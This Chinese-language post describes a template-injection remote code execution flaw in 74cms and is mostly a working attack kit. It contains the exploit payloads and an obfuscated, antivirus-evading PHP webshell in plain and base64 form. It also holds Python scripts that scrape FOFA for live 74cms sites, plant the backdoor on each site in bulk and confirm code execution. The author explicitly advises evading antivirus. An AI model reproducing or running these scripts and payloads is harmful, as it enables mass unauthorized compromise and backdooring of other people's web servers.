簡介
騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統
公告地址:
http://www.74cms.com/news/show-2497.html/Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函數因為過濾不嚴格,導致了模板注入,可以進行遠程命令執行
影響版本
騎士 CMS < 6.0.48環境搭建
這里使用phpstudy進行搭建
下載地址:
http://www.74cms.com/download/index.html
開始測試:1、注入模板到日志文件
發送poc: http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tpl POST: variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企業id="$_GET['id']"/>
注意的是我用win10電腦做測試,注入會被殺毒軟件攔截,注意做免殺
根據報錯查看日志:
路徑為WWW\74cms\upload\data\Runtime\Logs\Home
2、文件包含
發送poc:
http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tpl
POST:
variable=1&tpl=data/Runtime/Logs/Home/20_12_15.log(日志文件名為日期)
此刻在根目錄會成一個后門文件
3.直接用后門工具連接
知道了漏洞利用的過程,下面是自動化程序設計步驟
1.批量爬取該框架的url,這里需要換fofa的cookie才能爬取成功,要不只能爬取第一頁
import requests import base64 from lxml import etree import time import sys #第1頁 #https://fofa.so/result?_=1608294544861&page=2&per_page=10&qbase64=ImdsYXNzZmlzaCIgJiYgcG9ydD0iNDg0OCI%3D def fofa_search(search_data,page): #search_data='"glassfish" && port="4848" && country="CN"' headers={ 'cookie':'_fofapro_ars_session=53e19ce25439411e6b63466e166b9c27;result_per_page=20',#記得要換cookie } for yeshu in range(1,page+1): url='https://fofa.so/result?page='+str(yeshu)+'&qbase64=' search_data_bs=str(base64.b64encode(search_data.encode("utf-8")), "utf-8") urls=url+search_data_bs try: print('正在提取第' + str(yeshu) + '頁') result=requests.get(urls,headers=headers).content #print(result.decode('utf-8')) soup = etree.HTML(result) ip_data=soup.xpath('//div[@class="re-domain"]/a[@target="_blank"]/@href') ipdata='\n'.join(ip_data) print(ip_data) with open(r'ip2.txt','a+') as f: f.write(ipdata+'\n') f.close() time.sleep(5)#控制時間,防止過快網站反爬蟲 except Exception as e: print("出錯啦!!!") if __name__ == '__main__': #page=sys.argv[2] page=110 #爬取多少頁數 search='74cms' fofa_search(search,int(page))
2.准備免殺的馬
<?php
class JYWH{
function __destruct(){
$VKMF='PETFhL'^"\x31\x36\x27\x23\x1a\x38";
return @$VKMF("$this->BTMV");
}
}
$jywh=new JYWH();
@$jywh->BTMV=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>
3.把上面的馬利用base64編碼保護起來
base64_decode("PD9waHAgY2xhc3MgSllXSHsKICAgIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXsKICAgICAgICAkVktNRj0nUEVURmhMJ14iXHgzMVx4MzZceDI3XHgyM1x4MWFceDM4IjsKICAgICAgICByZXR1cm4gQCRWS01GKCIkdGhpcy0+QlRNViIpO319CiRqeXdoPW5ldyBKWVdIKCk7CkAkanl3aC0+QlRNVj1pc3NldCgkX0dFVFsnaWQnXSk/YmFzZTY0X2RlY29kZSgkX1BPU1RbJ21yNiddKTokX1BPU1RbJ21yNiddOz8+")
4.把馬寫進網站的php代碼
<?php $myfile = fopen("confgii.php", "w"); fwrite($myfile,base64_decode("PD9waHAgY2xhc3MgSllXSHsKICAgIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXsKICAgICAgICAkVktNRj0nUEVURmhMJ14iXHgzMVx4MzZceDI3XHgyM1x4MWFceDM4IjsKICAgICAgICByZXR1cm4gQCRWS01GKCIkdGhpcy0+QlRNViIpO319CiRqeXdoPW5ldyBKWVdIKCk7CkAkanl3aC0+QlRNVj1pc3NldCgkX0dFVFsnaWQnXSk/YmFzZTY0X2RlY29kZSgkX1BPU1RbJ21yNiddKTokX1BPU1RbJ21yNiddOz8+")); fclose($myfile);?>
執行上面的代碼會生存一個后門文件
該漏洞手動測試流程
http://127.0.0.1/74cms/upload/?m=home&a=assign_resume_tpl 1. variable=1&tpl=<?php $myfile = fopen("confgii.php", "w"); fwrite($myfile,base64_decode("PD9waHAgY2xhc3MgSllXSHsKICAgIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXsKICAgICAgICAkVktNRj0nUEVURmhMJ14iXHgzMVx4MzZceDI3XHgyM1x4MWFceDM4IjsKICAgICAgICByZXR1cm4gQCRWS01GKCIkdGhpcy0+QlRNViIpO319CiRqeXdoPW5ldyBKWVdIKCk7CkAkanl3aC0+QlRNVj1pc3NldCgkX0dFVFsnaWQnXSk/YmFzZTY0X2RlY29kZSgkX1BPU1RbJ21yNiddKTokX1BPU1RbJ21yNiddOz8+")); fclose($myfile);?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企業id="$_GET['id']"/> 2. variable=1&tpl=data/Runtime/Logs/Home/21_01_04.log 3. http://127.0.0.1/74cms/upload/confgii.php mr6=phpinfo(); http://127.0.0.1/74cms/upload/confgii.php?id=dd mr6=cGhwaW5mbygp;
5,准備環節都做好了,下面是批量該漏洞的驗證,同時上傳后門
import requests import time headers={ 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', #模擬用戶 Kit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 #模擬引擎 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html) #更多爬蟲引擎:https://www.cnblogs.com/iack/p/3557371.html 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0', 'Sec-Fetch-Dest': 'document', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'none', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', } def check_vuln(): payload_inject= '/?m=home&a=assign_resume_tpl' shell= '/confgii.php' proxys = { 'http':'http://127.0.0.1:8080' }#代理 data = { 'variable': '1', 'tpl': '<?php $myfile = fopen("confgii.php", "w");fwrite($myfile,base64_decode("PD9waHAgY2xhc3MgSl'\ 'lXSHsKICAgIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXsKICAgICAgICAkVktNRj0nUEVURmhMJ14iXHgzMVx4MzZceDI3XH'\ 'gyM1x4MWFceDM4IjsKICAgICAgICByZXR1cm4gQCRWS01GKCIkdGhpcy0+QlRNViIpO319CiRqeXdoPW5ldyBKWVdIKCk7'\ 'CkAkanl3aC0+QlRNVj1pc3NldCgkX0dFVFsnaWQnXSk/YmFzZTY0X2RlY29kZSgkX1BPU1RbJ21yNiddKTokX1BPU1RbJ2'\ '1yNiddOz8+"));fclose($myfile);?>;ob_flush();?>/r/n<qscms/company_show 列表名="info" />' } data2 = { 'variable': '1', 'tpl': 'data/Runtime/Logs/Home/21_01_04.log' } i=1 for ip in open('ip2.txt'): ip=ip.replace('\n','') inject_url=ip+payload_inject try: print(str(i)+": checking--------->"+ip) vuln_code_w=requests.post(inject_url,data, headers=headers, verify=False, timeout=3).status_code #verify=Falses i = i+1 print(vuln_code_w) time.sleep(0.2) except Exception as e: print('出錯啦!') time.sleep(0.2) shell_url=ip+shell try: vuln_code_2=requests.post(inject_url,data2, headers=headers, verify=False, timeout=3).status_code print(vuln_code_2) time.sleep(0.2) except Exception as e: print("出錯啦!") time.sleep(0.2) try: vuln_code=requests.get(shell_url, headers=headers, verify=False, timeout=3).status_code print(vuln_code) if vuln_code ==200: with open(r'vuln.txt','a+') as f: f.write(shell_url+'\n') f.close() print('成功上傳shell:'+shell_url) else: print("不存在該漏洞!") time.sleep(0.2) except Exception as e: print("出錯啦!") time.sleep(0.2) if __name__ == '__main__': check_vuln()
6.批量檢測后門是否可以代碼執行
import requests import time headers={ 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', #模擬用戶 Kit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 #模擬引擎 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html) #更多爬蟲引擎:https://www.cnblogs.com/iack/p/3557371.html 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0', 'Sec-Fetch-Dest': 'document', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'none', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', } def check_vuln(): shell= '/confgii.php' proxys = { 'http':'http://127.0.0.1:8080' }#代理 data2 = { 'mr6': 'print("adminokok1");' } i=1 for ip in open('vuln.txt'): ip=ip.replace('\n','') try: vuln_code=requests.post(ip, data2, headers=headers, verify=False, timeout=3) a=vuln_code.text #print(a) if a=='adminokok1': print(ip+" :-------------> 檢測到已經成功上傳后門!!!") with open(r'shell.txt','a+') as f: f.write(ip+'\n') f.close() else: print(ip+" :-----> 上傳后門失敗!") time.sleep(0.5) except Exception as e: print("出錯啦!") time.sleep(0.2) if __name__ == '__main__': check_vuln()